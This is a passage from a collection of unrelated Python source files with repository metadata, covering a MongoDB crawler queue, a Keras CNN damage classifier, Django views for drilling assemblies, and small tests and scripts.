info = "handle_write_queue,db:%s,coll:%s,size:%s,t_diff:%s" % (dbName, collName, qsize, t_diff)
self.logger.info(info)
def _handle_count_queue(self, limit):
if self.count_queue.qsize() >= limit:
t0 = time.time()
requests = []
qsize = self.count_queue.qsize()
while self.count_queue.qsize() > 0:
try:
tmp = self.count_queue.get_nowait()
self.count_queue.task_done()
except Exception as e:
self.logger.error(str(e))
break
requests.append(tmp)
if len(requests) > 0:
self.mc[settings.count_db_name][settings.count_coll_name].bulk_write(requests)
t_diff = time.time() - t0
info = "handle_count_queue,size:%s,t_diff,%s" % (qsize, t_diff)
self.logger.info(info)
@defer.inlineCallbacks
def _common_put_task_to_db(self, dbName, collName, data):
t0 = time.time()
self.init_write_queue(dbName, collName)
# 统计
res = yield self.mc[dbName][collName].find({"url": {"$in": list(set([t['url'] for t in data]))}}, {'url': 1})
exists = [r['url'] for r in res]
self.saveCountData(dbName, collName, common.NEW_TASK, len(data) - len(exists))
# 更新数据
for t in data:
if t["url"] not in exists:
self.write_queues[dbName][collName].put((t['url'], InsertOne(t)))
t_diff = time.time() - t0
info = "%s, %s, %s" % (dbName, collName, t_diff)
self.logger.debug(info)
defer.returnValue([])
@defer.inlineCallbacks
def _common_get_task_from_db(self, dbName, collName, count):
t0 = time.time()
self.init_task_queue(dbName, collName)
info = '%s, %s, qsize:%s' % (dbName, collName, self.task_queues[dbName][collName].qsize())
self.logger.debug(info)
if self.task_queues[dbName][collName].qsize() <= 0:
t1 = time.time()
tasks = yield self.mc[dbName][collName].find({'status': common.NOT_CRAWL},
limit=count * 10) # .limit(settings.get_tasks_num_one_time)
# tasks = self.mc[dbName][collName].find({'status':common.NOT_CRAWL}, limit=settings.get_tasks_num_one_time)
requests, ts = [], []
for task in tasks:
requests.append(
UpdateMany({'url': task["url"]}, {"$set": {"status": common.CRAWLING, "last_crawl_time": 0}}))
task.pop('_id')
ts.append(task)
if len(requests) > 0:
# self.mc[dbName][collName].bulk_write(requests)
yield self.mc[dbName][collName].bulk_write(requests)
for t in ts:
self.task_queues[dbName][collName].put(t)
t_diff = time.time() - t1
info = "query mongo, %s, %s, get:%s, use time:%s" % (dbName, collName, len(ts), t_diff)
self.logger.debug(info)
ts = []
for x in range(count):
try:
t = self.task_queues[dbName][collName].get_nowait()
self.task_queues[dbName][collName].task_done()
ts.append(t)
except:
# self.logger.error(str(e))
continue
t_diff = time.time() - t0
info = "total, %s, %s, return : %s , use time : %s" % (dbName, collName, len(ts), t_diff)
self.logger.debug(info)
defer.returnValue(ts)
def _common_change_task_status(self, dbName, collName, data):
t0 = time.time()
self.init_write_queue(dbName, collName)
# 统计
success = [t['url'] for t in data if t['status'] == common.CRAWL_SUCCESS]
self.saveCountData(dbName, collName, common.ONE_TASK, len(success))
# 更新数据
for t in data:
# self.logger.debug('url:%s,status:%s'%(t['url'],t['status']))
self.write_queues[dbName][collName].put(
(t['url'],
UpdateMany({'url': t['url']},
{"$set": {'status': t['status'],
'last_crawl_time': time.time()
}})
)
)
t_diff = time.time() - t0
info = "%s, %s, %s" % (dbName, collName, t_diff)
self.logger.debug(info)
def _common_put_data_to_db(self, dbName, collName, data):
"""为了性能,使用的是eplace方法"""
t0 = time.time()
self.init_write_queue(dbName, collName)
# 统计
self.saveCountData(dbName, collName, common.ONE_DATA, len(data))
#
for t in data:
t['crawl_time'] = time.time()
self.write_queues[dbName][collName].put((t['url'], ReplaceOne({'url': t['url']}, t, upsert=True)))
t_diff = time.time() - t0
info = "%s, %s, %s" % (dbName, collName, t_diff)
self.logger.debug(info)
def _common_insert_data_if_not_exist(self, dbName, collName, data):
"""如果数据不存在则插入,否则pass"""
t0 = time.time()
for t in data:
if not self.mc[dbName][collName].find_one({'url': t['url']}):
t['crawl_time'] = time.time()
self.mc[dbName][collName].insert_one(t)
t_diff = time.time() - t0
info = "%s, %s, %s" % (dbName, collName, t_diff)
self.logger.debug(info)
def _common_update_data(self, dbName, collName, data):
"""更新数据"""
t0 = time.time()
self.init_write_queue(dbName, collName)
for t in data:
t['crawl_time'] = time.time()
self.write_queues[dbName][collName].put((t['url'],
UpdateOne({'url': t['url']}, t, upsert=True)))
t_diff = time.time() - t0
info = "%s, %s, %s" % (dbName, collName, t_diff)
self.logger.debug(info)
# 存储统计数据
def saveCountData(self, dbName, collName, _type, count):
date = time.strftime("%Y-%m-%d", time.localtime())
# 网站
u1 = UpdateOne({'date': date, 'dbName': dbName, 'collName': collName, "_type": _type},
{'$inc': {'total': count}}, upsert=True)
# 总体
u2 = UpdateOne({'date': date, 'dbName': "all", 'collName': "all", "_type": _type}, {'$inc': {'total': count}},
upsert=True)
self.count_queue.put(u1)
self.count_queue.put(u2)
if __name__ == '__main__':
pass
|
[
"bestrenxs@gmail.com"
] |
bestrenxs@gmail.com
|
7ea06b38a6bea4ad844f28beed5014ddf7ec3be8
|
7899e522049f9c7aac5cc9a19a0e3cc36c132067
|
/FlaskAPI/requests.py
|
687a42138dd8d640c816138effcbcda6e9996c52
|
[] |
no_license
|
adityapoojary/ds_salary_proj
|
261e25a7bd48d1402e9e425d7f1c18eeb5d2c3bf
|
720fed3c0fcbe5169dd13799dc08fe7eb422906b
|
refs/heads/master
| 2023-08-11T04:52:14.493436 | 2021-09-21T01:17:40 | 2021-09-21T01:17:40 | 380,216,228 | 0 | 0 | null | 2021-06-27T03:59:13 | 2021-06-25T11:26:22 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 301 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 29 23:53:45 2021
@author: adity
"""
import requests
from data_input import data_in
URL = 'http://127.0.0.1:5000/predict'
headers = {"Content-Type": "application/json"}
data = {"input":data_in}
r = requests.get(URL,headers=headers,json=data)
r.json()
|
[
"43313663+SirHacksalott@users.noreply.github.com"
] |
43313663+SirHacksalott@users.noreply.github.com
|
21a3244c094f2c6fdba9b385874dde119094b631
|
525690b220962de7f6253dd1dc557717cffc3441
|
/openstack/tests/unit/cloud_eye/test_cloudeye_service.py
|
35b73816fe5fdd9edf0eaeabe9ed72d39d48f02c
|
[
"Apache-2.0"
] |
permissive
|
huaweicloudsdk/sdk-python
|
bb8dc2bc195d0bdaddf13fef484e3f28aeb2681f
|
60d75438d71ffb7998f5dc407ffa890cc98d3171
|
refs/heads/master
| 2021-06-05T00:04:59.030371 | 2018-09-30T09:40:49 | 2018-09-30T09:40:49 | 110,813,153 | 20 | 18 |
NOASSERTION
| 2020-07-23T17:01:59 | 2017-11-15T09:31:50 |
Python
|
UTF-8
|
Python
| false | false | 1,102 |
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from openstack.cloud_eye import cloud_eye_service
class TestCloudEyeService(testtools.TestCase):
def test_service(self):
sot = cloud_eye_service.CloudEyeService()
self.assertEqual('cloud-eye', sot.service_type)
self.assertEqual('public', sot.interface)
self.assertIsNone(sot.region)
self.assertIsNone(sot.service_name)
self.assertEqual(1, len(sot.valid_versions))
self.assertEqual('v1', sot.valid_versions[0].module)
self.assertEqual('v1', sot.valid_versions[0].path)
|
[
"iampurse@vip.qq.com"
] |
iampurse@vip.qq.com
|
9713a8500afd874259cb4bbe41e73268a84767b0
|
f735f133ef299e65d3ea7d0d90a2dcbe49c030a1
|
/csv_file_extraction.py
|
697653884fa7ed26f2c33806628304fa4bcc7308
|
[] |
no_license
|
agrzybkowska/Data8Project
|
41bbd1ee39e2f45f3951348923afdadef1812bea
|
8c5decc720aae8b8555e7864b12361b46b57b2fa
|
refs/heads/master
| 2021-06-12T22:53:57.438660 | 2020-04-09T11:15:44 | 2020-04-09T11:15:44 | 254,408,086 | 0 | 0 | null | 2020-04-09T15:23:59 | 2020-04-09T15:23:59 | null |
UTF-8
|
Python
| false | false | 1,703 |
py
|
##not nicely packaged as a fucntion yet sorry
import boto3
from pprint import pprint
import csv
s3_client = boto3.client('s3')
contents = s3_client.list_objects_v2(Bucket='data8-engineering-project')['Contents']
a= 0
for x in contents:
a = a + 1
b= a
splitfile = x['Key'].split('/')
if splitfile[0] == 'Academy': ###doesnt work because all the taqlent ones are more than 1000th in the list
data = s3_client.get_object(Bucket='data8-engineering-project',
Key = x['Key'])
old_data = data['Body'].read().decode('utf-8').strip()
old_data1 =(old_data.replace(' ', ''))
old_data2 = old_data1.split()
print(old_data2)
csv_reader = csv.DictReader(old_data2)
with open('Blank_CSV' + str(b) + '.csv', 'w') as new_file:
fieldnames = ['name', 'trainer', 'IH_W1', 'IS_W1', 'PV_W1', 'PS_W1', 'SD_W1', 'SA_W1', 'IH_W2', 'IS_W2', 'PV_W2', 'PS_W2', 'SD_W2', 'SA_W2', 'IH_W3', 'IS_W3', 'PV_W3', 'PS_W3', 'SD_W3', 'SA_W3', 'IH_W4', 'IS_W4', 'PV_W4', 'PS_W4', 'SD_W4', 'SA_W4', 'IH_W5', 'IS_W5', 'PV_W5', 'PS_W5', 'SD_W5', 'SA_W5', 'IH_W6', 'IS_W6', 'PV_W6', 'PS_W6', 'SD_W6', 'SA_W6', 'IH_W7', 'IS_W7', 'PV_W7', 'PS_W7', 'SD_W7', 'SA_W7', 'IH_W8', 'IS_W8', 'PV_W8', 'PS_W8', 'SD_W8', 'SA_W8', 'IH_W9', 'IS_W9', 'PV_W9', 'PS_W9', 'SD_W9', 'SA_W9', 'IH_W10', 'IS_W10', 'PV_W10', 'PS_W10', 'SD_W10', 'SA_W10']
csv_writer = csv.DictWriter(new_file, fieldnames=fieldnames)
csv_writer.writeheader()
for line in csv_reader: # Iterates through the user_details file in read mode.
csv_writer.writerow(line)
|
[
"noreply@github.com"
] |
agrzybkowska.noreply@github.com
|
0e4635e67e5d0d55f1378f08260a7f06ee2e70cc
|
c6292c1dd68f0c4dd3389628de0d2b786fa0ee64
|
/0x06-python-classes/0-square.py
|
4c030f02dd19538abaad2c6f969458caac16080a
|
[] |
no_license
|
mj31508/holbertonschool-higher_level_programming2
|
835be695b568cd189c1448c54218a0201830005f
|
3fa47001c041cd0c74f88c3a19677e126bee37b4
|
refs/heads/master
| 2021-07-06T22:31:05.040354 | 2017-09-29T05:28:45 | 2017-09-29T05:28:45 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 79 |
py
|
#!/usr/bin/python3
"""
Defines empty class Square
"""
class Square:
pass
|
[
"mj31508@gmail.com"
] |
mj31508@gmail.com
|
9005aa6da759029734d49699d61f6dfb82e382ee
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_subordinating.py
|
f414e402006d840f8543ad90d26aa0594767e83c
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 285 |
py
|
from xai.brain.wordbase.adjectives._subordinate import _SUBORDINATE
#calss header
class _SUBORDINATING(_SUBORDINATE, ):
def __init__(self,):
_SUBORDINATE.__init__(self)
self.name = "SUBORDINATING"
self.specie = 'adjectives'
self.basic = "subordinate"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
b4ed90aafb2fe13b609cabbd99a433643da13a2f
|
5708a5b29d386e60acb7f93b41339ab767e80411
|
/portal/posts/migrations/0011_post_confession.py
|
cdf0c988d532b89cb6422537939b90f4e57fe444
|
[] |
no_license
|
Pradyumnabiswal99/RestApiFounder
|
70a42ad3dce3f1818fd18cc3bae3b6bc81372a39
|
e031ac55830d74ca465427fae0e593ce94da236d
|
refs/heads/master
| 2023-02-19T12:25:24.515359 | 2020-02-24T18:16:33 | 2020-02-24T18:16:33 | 332,734,375 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 403 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('posts', '0010_auto_20160920_1545'),
]
operations = [
migrations.AddField(
model_name='post',
name='confession',
field=models.BooleanField(default=False),
),
]
|
[
"kaushik.debojit@gmail.com"
] |
kaushik.debojit@gmail.com
|
b204c2541423dde521dadee3fceaa2623a7ebe59
|
7a4ed01a40e8d79126b26f5e8fca43c8e61e78fd
|
/Geeky Shows/Core Python/128.reduce_Function[159].py
|
de2e40159a3a8f0c556f8d593fb761aa271c252a
|
[] |
no_license
|
satyam-seth-learnings/python_learning
|
5a7f75bb613dcd7fedc31a1567a434039b9417f8
|
7e76c03e94f5c314dcf1bfae6f26b4a8a6e658da
|
refs/heads/main
| 2023-08-25T14:08:11.423875 | 2021-10-09T13:00:49 | 2021-10-09T13:00:49 | 333,840,032 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 113 |
py
|
from functools import reduce
a=[10,20,30,40,50]
result=reduce(lambda n,m:n+m,a)
print(result)
print(type(result))
|
[
"satyam1998.1998@gmail.com"
] |
satyam1998.1998@gmail.com
|
fcb6271b2ee05afbde34d933504cfdd1ae3f7cc4
|
1647fced5b389cdee749bd81d809db6442b2c1d7
|
/listmethods/listmeth01.py
|
01f537ddf52561205afb339f82db6c2290d12669
|
[] |
no_license
|
Lalit554/mycode
|
774931e68db8a97a88bbcfc9c685c7844c7870c8
|
39d186fde871c3a118a0c65888390b0e81ff921f
|
refs/heads/main
| 2023-06-06T12:03:56.009416 | 2021-06-23T18:31:39 | 2021-06-23T18:31:39 | 361,773,554 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 173 |
py
|
#!/usr/bin/env python3
proto = ["ssh", "http", "https"]
print (proto)
print (proto[1])
proto.extend("dns") ## appends each letter as an element to the list
print(proto)
|
[
"lalit.patil@fcagroup.com"
] |
lalit.patil@fcagroup.com
|
e9548f4466470f2ecbfe2b5aed82e666be9fd889
|
8648656c85014a8dee62334a6d85e9dcef17befb
|
/cnn_classifier_SaveAllFolds.py
|
8e906ed0b06288d2c9b08b9c9622ec09616d4ecb
|
[
"CC0-1.0"
] |
permissive
|
mohsen-azimi/SHM_CNN_CompressedData
|
865d0d6efef5e4a0ee7620a29c0721fe49ad3a97
|
0b5c82d8fa64fb791d3c9690d3a3de5632413cf3
|
refs/heads/master
| 2022-08-22T15:37:41.331974 | 2022-08-03T23:51:26 | 2022-08-03T23:51:26 | 231,650,234 | 6 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,475 |
py
|
import tensorflow as tf
import keras
from keras import Sequential
from keras.models import load_model
from keras.layers.advanced_activations import LeakyReLU, PReLU
from keras.layers.normalization import BatchNormalization
from keras.layers import Dense, Flatten, Dropout, Conv1D, MaxPool1D, AvgPool1D,Conv2D, MaxPool2D, Activation
from keras.utils.vis_utils import plot_model
from utils import convert_matlab_file, load_dataset, plot_confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.cross_validation import StratifiedKFold
from sklearn.linear_model import LogisticRegression
from sklearn import svm
from sklearn.metrics import roc_curve, auc
from sklearn.preprocessing import label_binarize
from sklearn.multiclass import OneVsRestClassifier
from scipy import interp
from itertools import cycle
import hdf5storage
from keras.utils import np_utils
import numpy
import math
import scipy.io
import time
################################## for plot confusion imports
import itertools
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
class History(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.acc = []
self.loss = []
def on_epoch_end(self, epoch, logs={}):
self.acc.append(logs.get('acc'))
self.loss.append(logs.get('loss'))
def create_CNN_model():
model = Sequential()
# ................................................................................................................
model.add(Conv1D(filters=16, kernel_size=3, strides=1, padding='same', activation='relu', use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(Conv1D(filters=16, kernel_size=3, strides=1, padding='same', activation='relu',use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(BatchNormalization(epsilon=1e-06, mode=0, momentum=0.9, weights=None)) # Batch Normalization
model.add(LeakyReLU(alpha=.01)) # advanced activation layer
model.add(MaxPool1D(pool_size=2, strides=None, padding='valid'))
# ................................................................................................................
model.add(Conv1D(filters=32, kernel_size=3, strides=1, padding='same', activation='relu',use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(Conv1D(filters=32, kernel_size=3, strides=1, padding='same', activation='relu',use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(BatchNormalization(epsilon=1e-06, mode=0, momentum=0.9, weights=None)) # Batch Normalization
model.add(LeakyReLU(alpha=.01)) # advanced activation layer
model.add(MaxPool1D(pool_size=2, strides=None, padding='valid'))
# ................................................................................................................
model.add(Conv1D(filters=64, kernel_size=3, strides=1, padding='same', activation='relu', use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(Conv1D(filters=64, kernel_size=3, strides=1, padding='same', activation='relu', use_bias=False, input_shape=(lenSignal, nSensors)))
model.add(BatchNormalization(epsilon=1e-06, mode=0, momentum=0.9, weights=None)) # Batch Normalization
model.add(LeakyReLU(alpha=.01)) # advanced activation layer
model.add(MaxPool1D(pool_size=2, strides=None, padding='valid'))
# ................................................................................................................
model.add(Flatten())
model.add(BatchNormalization())
#
model.add(Dense(nClasses*1))
model.add(Dense(nClasses*1))
model.add(Dense(nClasses, activation='softmax'))
###################################################################################################################
learnignRate = 0.00005
opt = keras.optimizers.Adam(lr=learnignRate, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['acc', 'mse', 'mae','categorical_crossentropy'])
plot_model(model, to_file='model_plot.png', show_shapes=True, show_layer_names=True)
model.summary()
# ...................................................................................................................
return model
# ...................................................................................................................
# #####################################################################################################################
loadMAT = 'A_SHM3_freq' # 1,2, 4,5,6,7
# loadMAT = 'A_SHM1' # 1,2, 4,5,6,7
saveMAT = loadMAT
saveModel = loadMAT
# #####################################################################################################################
def shuffle(a, b):
assert len(a) == len(b)
p = np.random.permutation(len(a))
return a[p], b[p]
# #####################################################################################################################
matlab_file = 'BenchMark/Outputs/'+loadMAT+'.mat'
mat = hdf5storage.loadmat(matlab_file)
InputData = np.transpose(mat['InputData'], (2, 0, 1))
TargetData = mat['TargetData']
nSamples = int(np.asscalar(mat['nSamples']))
lenSignal = int(np.asscalar(mat['lenSignal']))
nSensors = int(np.asscalar(mat['nSensors']))
nClasses = int(np.asscalar(mat['nClasses']))
X = InputData
Y = np_utils.to_categorical(TargetData)
X, Y = shuffle(X, Y)
# -----------------------------------------------------------------------------------------------------------------
# #####################################################################################################################
# -----------------------------------------------------------------------------------------------------------------
# ############ CNN ###############
# ################################
# ###############################
with tf.device("/gpu:1"):
print("Training is started")
t0 = time.time() # t0
nFolds = 10
skfold = StratifiedKFold(numpy.argmax(Y, axis=-1), n_folds=nFolds, shuffle=True, random_state=None)
print("skfold:",skfold)
fold = 1
for train_index, test_index in skfold:
model = create_CNN_model()
# model = create_SVC_model()
history = History()
# nepochs = 100
nepochs = 500
batchsize = 256
model.fit(X[train_index], Y[train_index], epochs=nepochs, batch_size=batchsize, callbacks=[history], verbose=1)
scores = model.evaluate(X[test_index], Y[test_index], verbose=1)
print(scores)
print("%s: %.2f" % (model.metrics_names[0], scores[0] ))
print("%s: %.2f" % (model.metrics_names[1], scores[1] ))
print("%s: %.2f" % (model.metrics_names[2], scores[2] ))
print("%s: %.2f" % (model.metrics_names[3], scores[3] ))
print("%s: %.2f" % (model.metrics_names[4], scores[4] ))
Y_testpred = model.predict_classes(X[test_index])
Y_testpredScores = model.predict(X[test_index])
# Compute confusion matrix
Y_testtrue = np.argmax(Y[test_index], axis=1)
cnf_matrix = confusion_matrix(Y_testtrue, Y_testpred)
# TH:
# model.save('saveModels/' + saveModel + '_TH_fold' + str(fold) + '.h5')
# Freq:
model.save('saveModels/' + saveModel + '_fold' + str(fold) + '.h5')
# TH:
# scipy.io.savemat('saveMATs/' + saveMAT + '_TH_fold' + str(fold) + '.mat', {
# Freq:
scipy.io.savemat('saveMATs/' + saveMAT + '_fold' + str(fold) + '.mat', {
'Y_true': Y_testtrue,
'Y_pred': Y_testpred,
'Y_predScores': Y_testpredScores,
'AccuracyTH': history.acc,
'LossTH': history.loss,
'nClasses': nClasses,
'nepochs': nepochs,
'batchsize': batchsize,
'scores': scores,
'cnf_matrix': cnf_matrix,
'nFolds': nFolds,
'fold': fold,
})
#
# np.set_printoptions(precision=2)
#
# # Plot non-normalized confusion matrix
# plt.figure()
# class_names = np.array(["Intact", "Pattern1", "Pattern2"],dtype='<U10')
# plot_confusion_matrix(cnf_matrix, classes=class_names,
# title='Confusion matrix, without normalization')
#
# # Plot normalized confusion matrix
# plt.figure()
# plot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,
# title='Normalized confusion matrix')
#
# plt.show()
#
# plt.figure()
# plt.plot(range(0, nepochs), history.acc, 'b--') # plt.plot(range(0, nepochs*math.ceil(0.9*nSamples/batchsize)), history.acc, 'b--')
# plt.xlabel('Epochs')
# plt.ylabel('Accuracy')
# plt.show()
# plt.pause(0.05)
# plt.figure()
# plt.plot(range(0, nepochs), history.loss, 'r--')
# plt.xlabel('Epochs')
# plt.ylabel('Loss')
# plt.show()
# plt.pause(0.05)
t1 = time.time() # t1 at the end
print("Total Run Time: ", int(t1-t0), " seconds")
fold += 1
# ####################################################################################
# play something!
import winsound
duration = 2000 # milliseconds
freq = 440 # Hz
winsound.Beep(freq, duration)
|
[
"noreply@github.com"
] |
mohsen-azimi.noreply@github.com
|
0905cc6c738a84c48c2cf095039d96d8fe7af5d9
|
3b7e22b8c1cc96f6fd8440ad1ec1288bc2140d0f
|
/firstapp/views.py
|
3cd82201cd161e23cc248e9fe2646dd5313acf4e
|
[] |
no_license
|
bunnygoud25/mukeshportfolio
|
535c336ebb7fcad14a5bf14cf5ea6b19dd6ab1fb
|
96346b847df588ff345dff512eff6dba0273142e
|
refs/heads/master
| 2020-07-31T00:44:40.957487 | 2019-09-23T18:19:39 | 2019-09-23T18:19:39 | 209,590,626 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 280 |
py
|
from django.shortcuts import render
import os
from django.conf import settings
from django.http import HttpResponse, Http404
# Create your views here.
def index(request):
return render(request,'index.html')
def hire(request):
return render(request,'hire.html')
|
[
"bunnygoud25@gmail.com"
] |
bunnygoud25@gmail.com
|
8fd238c93ae823bd8fbe9ee076b046a2eeb24a10
|
e27ee08fbb99ca2abf0f822783603ac649a44f1d
|
/primeSum.py
|
3ea232f3c4d15d9413732d2f45dbba6556a07fd4
|
[] |
no_license
|
weida8/Practice
|
c2def43ffd7e1f43163616c4dbb5aaa697cc8c63
|
2de2a6076e12fe196a7eea89cc69fb3a59ceaec7
|
refs/heads/master
| 2021-01-23T13:31:33.914228 | 2018-07-24T04:21:58 | 2018-07-24T04:21:58 | 102,670,404 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 214 |
py
|
def isPrime(n):
for i in range(2, n):
if(n%i == 0):
return False
return True
def main():
totalSum =0
for i in range(2, 2000000):
if(isPrime(i)):
print(i)
totalSum += i
print(totalSum)
main()
|
[
"noreply@github.com"
] |
weida8.noreply@github.com
|
e4f116f2d1e3e8c08ce2c7c35289d60e7a2455e5
|
3b2940c38412e5216527e35093396470060cca2f
|
/top/api/rest/SimbaAdgroupsChangedGetRequest.py
|
5b87c69b8afb5cee0f9b6ef7edd9ba1abccebb0d
|
[] |
no_license
|
akingthink/goods
|
842eb09daddc2611868b01ebd6e330e5dd7d50be
|
ffdb5868a8df5c2935fc6142edcdf4c661c84dca
|
refs/heads/master
| 2021-01-10T14:22:54.061570 | 2016-03-04T09:48:24 | 2016-03-04T09:48:24 | 45,093,302 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 398 |
py
|
'''
Created by auto_sdk on 2015-01-20 12:44:31
'''
from top.api.base import RestApi
class SimbaAdgroupsChangedGetRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.nick = None
self.page_no = None
self.page_size = None
self.start_time = None
def getapiname(self):
return 'taobao.simba.adgroups.changed.get'
|
[
"yangwenjin@T4F-MBP-17.local"
] |
yangwenjin@T4F-MBP-17.local
|
ae75f741053ce7f25c92b229213b38134118e778
|
02619be3f115d170ab2e2951af482ef69698bbce
|
/bha/views.py
|
62c564cd3314ae02ecf027e66bcd9aa49932d51c
|
[] |
no_license
|
xkenneth/tdsurface
|
08852b5f9f809ed682e4b50938d60d711884d94a
|
ec15a05e581ec5f53287cab31af2f4f3e1efcb63
|
refs/heads/master
| 2021-03-12T23:11:32.547441 | 2009-08-12T20:58:29 | 2009-08-12T20:58:29 | 84,442 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,464 |
py
|
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.http import HttpResponseNotFound
from django.http import Http404
from django.template import loader, Context
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from tdsurface.shortcuts import get_object_or_None
from tdsurface.depth.models import Run
from tdsurface.bha.models import *
from tdsurface.bha.forms import *
from django.utils import simplejson
MAX_JETS=9
MAX_PUMPS=3
def bha_update(request, object_id, extra_context=None) :
run = Run.objects.get(pk=object_id)
bha, created = BHA.objects.get_or_create(run=run)
bit, created = Bit.objects.get_or_create(bha=bha)
assets, created = SerializedAssests.objects.get_or_create(bha=bha)
jets = Jet.objects.filter(bit=bit)
if len(jets) < MAX_JETS :
for x in range(MAX_JETS - len(jets)) :
j = Jet(bit=bit)
j.save()
jets = Jet.objects.filter(bit=bit)
pumps = Pump.objects.filter(bha=bha).order_by('number')
if len(pumps) < MAX_PUMPS :
cnt = len(pumps)
for x in range(MAX_PUMPS - len(pumps)) :
cnt=cnt+1
p = Pump(bha=bha, number=cnt)
p.save()
pumps = Pump.objects.filter(bha=bha).order_by('number')
if request.method == 'POST':
bha_form = BHAForm(request.POST, instance=bha) # A form bound to the POST data
bit_form = BitForm(request.POST, instance=bit)
jet_forms = [JetForm(request.POST, prefix='jet'+str(x), instance=jets[x]) for x in range(MAX_JETS)]
pump_forms = [PumpForm(request.POST, prefix='pump'+str(x), instance=pumps[x]) for x in range(MAX_PUMPS)]
collar_form = CollarForm(request.POST)
probe_form = ProbeForm(request.POST)
surface_gear_form = SurfaceGearForm(request.POST)
if all([collar_form.is_valid(), probe_form.is_valid(), surface_gear_form.is_valid(), bha_form.is_valid(), bit_form.is_valid()] + [x.is_valid() for x in jet_forms] + [x.is_valid() for x in pump_forms]) : # All validation rules pass
bha_form.save()
bit_form.save()
for jet_form in jet_forms :
jet_form.save()
for pump_form in pump_forms :
pump_form.save()
d = {'pk':assets.pk, 'bha_id':assets.bha_id}
d.update(collar_form.cleaned_data)
d.update(probe_form.cleaned_data)
d.update(surface_gear_form.cleaned_data)
SerializedAssests(**d).save()
return HttpResponseRedirect(reverse('bha_update', args=[object_id]))
else :
bha_form = BHAForm(instance=bha)
bit_form = BitForm(instance=bit)
jet_forms = [JetForm(prefix='jet'+str(x), instance=jets[x]) for x in range(MAX_JETS)]
pump_forms = [PumpForm(prefix='pump'+str(x), instance=pumps[x]) for x in range(MAX_PUMPS)]
collar_form = CollarForm(initial=assets.__dict__)
probe_form = ProbeForm(initial=assets.__dict__)
surface_gear_form = SurfaceGearForm(initial=assets.__dict__)
pump_fields = []
for field in pump_forms[0].fields :
pump_fields.append([])
for pump_form in pump_forms :
cnt=0
for field in pump_form.fields :
pump_fields[cnt].append(field)
cnt = cnt+1
data = {'object': run,
'bha_form': bha_form,
'bit_form': bit_form,
'jet_forms': jet_forms,
'pump_forms': pump_forms,
'pump_fields': pump_fields,
'bha':bha,
'collar_form': collar_form,
'probe_form': probe_form,
'surface_gear_form': surface_gear_form,}
for key, value in extra_context.items():
if callable(value):
data[key] = value()
else:
data[key] = value
return render_to_response('bha_update_form.html', data, context_instance = RequestContext(request))
def bha_component_grid(request, object_id) :
run = Run.objects.get(pk=object_id)
bha = BHA.objects.get(run=run)
page = int(request.GET['page'])
rows = int(request.GET['rows'])
sort_order= ''
if request.GET['sord'] == 'desc' :
sort_order= '-'
cs = Component.objects.filter(bha=bha).order_by(sort_order+request.GET['sidx'])
records = len(cs)
total_pages = records/rows;
if records % rows :
total_pages += 1
data={
'total': total_pages,
'page': page,
'records': records,
'rows' : [ ],
}
for r in cs[(page-1)*rows:page*rows] :
rd = {}
rd["id"] = r.pk
rd['order'] = str(r.order)
rd['description'] = r.description
rd['serial_number'] = r.serial_number
rd['odia'] = str(r.odia)
rd['idia'] = str(r.idia)
rd['fn_length'] = str(r.fn_length)
rd['top_conn'] = r.top_conn
rd['pb'] = r.pb
rd['length'] = str(r.length)
data['rows'].append(rd)
data = simplejson.dumps(data)
return HttpResponse(data, mimetype="application/javascript")
def bha_component_grid_edit(request, object_id) :
run = Run.objects.get(pk=object_id)
bha = BHA.objects.get(run=run)
if request.method=='POST' :
if request.POST['id'] == 'new' :
order = request.POST['order']
if order == 'end' :
order = 9999
order = int(order)
print 'we got here'
c = Component(bha=bha,
order = order,
description = request.POST['description'],
serial_number = request.POST['serial_number'],
odia = request.POST['odia'],
idia = request.POST['idia'],
fn_length = request.POST['fn_length'],
top_conn = request.POST['top_conn'],
pb = request.POST['pb'],
length = request.POST['length']
)
print 'how bout here'
cs = Component.objects.filter(bha=bha).order_by('order')
max_order = 0
